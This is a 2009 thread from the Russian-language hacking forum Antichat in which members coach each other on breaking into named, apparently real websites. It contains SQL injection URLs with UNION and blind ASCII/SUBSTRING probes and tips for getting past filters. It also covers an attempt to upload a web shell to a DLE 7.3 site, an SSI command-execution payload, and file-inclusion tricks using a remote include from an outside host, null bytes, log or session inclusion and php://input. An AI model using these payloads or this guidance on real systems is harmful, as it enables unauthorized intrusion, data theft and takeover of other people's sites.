ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
15.08.2009, 19:18
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137
Репутация:
66
|
|
Сообщение от bons
если изменить поле Host в запросе то веб-сервер просто не узнает какому из виртуальных хостов пришел запрос. То есть до скрипта он уже вряд ли дойдет
Только в случае, если виртуальные хосты host-based.
Уязвимость имеет место, то есть скрипт исполняется и в теле XML фигурирует значение Host-заголовка.
|
|
|
15.08.2009, 21:26
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
нашел скулю но там какая-та фильтрация
смотрим
видим 1 юзера
http://playthegame.od.ua/index.php?action=9&showuser=3058
видем юзера под ид 3057
http://playthegame.od.ua/index.php?action=9&showuser=3058-1
если делаем так то видим ошибку
http://extremission.com.ua/index.php?action=8
но при попытки
http://playthegame.od.ua/index.php?action=9&showuser=3058
дописать что-то типо union select и т.п. ничего не получаеться....
есть идеи*?
|
|
|
|
16.08.2009, 00:08
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от fast_start
http://www.broowaha.com/profile.php?id=2434+ORDER+BY+18/* выдает ошибку,
http://www.broowaha.com/profile.php?id=2434+ORDER+BY+17/* срабатывает нормально. ОК,значит столбцов 17.
Делаю http://www.broowaha.com/profile.php?id=2434+UNION+SELECT+11111,22222,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17/*
но ничего не выводит. Пытался определить версию, методом, которым вы меня научили:
http://www.broowaha.com/profile.php?id=2434+AND+1=IF(ASCII(SUBSTRING((SELE CT+version()),1,1))%3E=52,1,0)/*
ответ таков:
Error, select query failed: 1064:You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT version()),1,1))>=52,1,0)/* AND tAuthors.status = 'activ
Как дальше действовать?
я тебе сказал крутить как слепую твой прошлый пример, т.к. именно в том параметре я других вариантов не видел, это не значит, что так надо крутить все скули. Нафига тебе эти сложности, если эту можно раскрутить как обычную, т.е. как написал попугай.
Опять же на протяжении всего поста ты показывал ему как узнать версию, я и подмитил, что не к чему использовать такие громоздкие конструкции при определении версии(это не оправдывает себя), вот когда названия таблиц и столбцов подбирать начнешь, тогда да, но это совершенно другой вопрос, так или иначе то, что ты ему объяснил, это как вилами по воде, надеюсь понимаешь о чём я.
Ну это уже конкретика, естественно, что у каждого свои трики, которыми он пользуется, для меня лично легче сразу написать всю конструкцию с ascii(), а потом поменять version() например на user(), чем писать сначала без ascii() а потом ее дописывать... а вообще это все хрень, так все равно никто вручную все базы, столбцы, данные и т.д. перебирать не будет...
Последний раз редактировалось nemaniak; 16.08.2009 в 00:15..
|
|
|
|
16.08.2009, 00:28
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Сообщение от Grema
нашел скулю но там какая-та фильтрация
смотрим
видим 1 юзера
http://playthegame.od.ua/index.php?action=9&showuser=3058
видем юзера под ид 3057
http://playthegame.od.ua/index.php?action=9&showuser=3058-1
если делаем так то видим ошибку
http://extremission.com.ua/index.php?action=8
но при попытки
http://playthegame.od.ua/index.php?action=9&showuser=3058
дописать что-то типо union select и т.п. ничего не получаеться....
есть идеи*?
ne nadoelo? Nu prob'esh ty golovoy stenku. chto ty budesh delat' v sosednej kamere?
|
|
|
|
16.08.2009, 03:55
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 53
Провел на форуме:
170968
Репутация:
10
|
|
Сообщение от u36a
Есть доступ к бд, где таблицы dle (просмотр\запись, не root@mysql). Может можно там поменять пути на файлы?
Странно, но не могу найти, где добавлять файлы к новостям, в настройках разрешил добавлять файлы, указал расширения нужные, размер и т.п. А там где добавление новостей или их редактирование не могу найти, как всунуть атач.  .php перед flv убирается движком..
Удалось залить файл ......../uploads/files/1250379992_functions.phtml.flv
но он не интрепретируется, а скачивается...
Какие ещё есть варианты залить шел через движок дле 7.3 версии?
|
|
|
|
16.08.2009, 04:19
|
|
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме:
110312
Репутация:
50
|
|
Попробуй залить .shtml-файл вот с таким <!--#exec cmd="$QUERY_STRING_UNESCAPED"-->
|
|
|
|
16.08.2009, 05:44
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Grema
нашел скулю но там какая-та фильтрация
смотрим
видим 1 юзера
http://playthegame.od.ua/index.php?action=9&showuser=3058
видем юзера под ид 3057
http://playthegame.od.ua/index.php?action=9&showuser=3058-1
если делаем так то видим ошибку
http://extremission.com.ua/index.php?action=8
но при попытки
http://playthegame.od.ua/index.php?action=9&showuser=3058
дописать что-то типо union select и т.п. ничего не получаеться....
есть идеи*?
Может быть intval();
Хотя &showuser=3058-1 работает.
пробуй
unIoN+SeLecT
Может быть просто фильтр.
|
|
|
|
16.08.2009, 10:46
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Смотрите есть сайт с PHP-inj
http://site.ru/module/index.php?p=index
Ну понятно что в $_GET[p] и переносится путь до файла.
Если указываю не верный путь то пишет что фаил не найден, значит стоит проверка на то есть ли фаил...
Открыл config.php начего не написалось так как нет вывода...
Также есть форум на vBulletin ну попробовал открыть индекс
../forum/index мне написалось что пути до конфгов не найдены и уже видел еррор, тоесть ошибки не отключены
Из ошибки видно что апач стоит на винде...
попытки загрузить внешку типо
PHP код:
http://site.ru/module/index.php?p=http://forum.antichat.ru/newreply
Закнончились неудачей типо фаил не найден, FTP метод тож не прошёл...
Подскажите что можно сделать?
Может так как система на винде, можно чтолить интересного накопать? Хотя не могу оборвать расширение которое присваевается (.php)
Последний раз редактировалось Byrger; 16.08.2009 в 14:36..
|
|
|
|
16.08.2009, 10:55
|
|
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме:
110312
Репутация:
50
|
|
Может скрипт прикручивает расширение файлу? Попробуй поэксперементировать с нулл-байтом.
|
|
|
|
16.08.2009, 13:34
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
обрезать расширение нул-байтом и инклудить логи/картинки/сессии/environ/etc
попробовать php://input
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
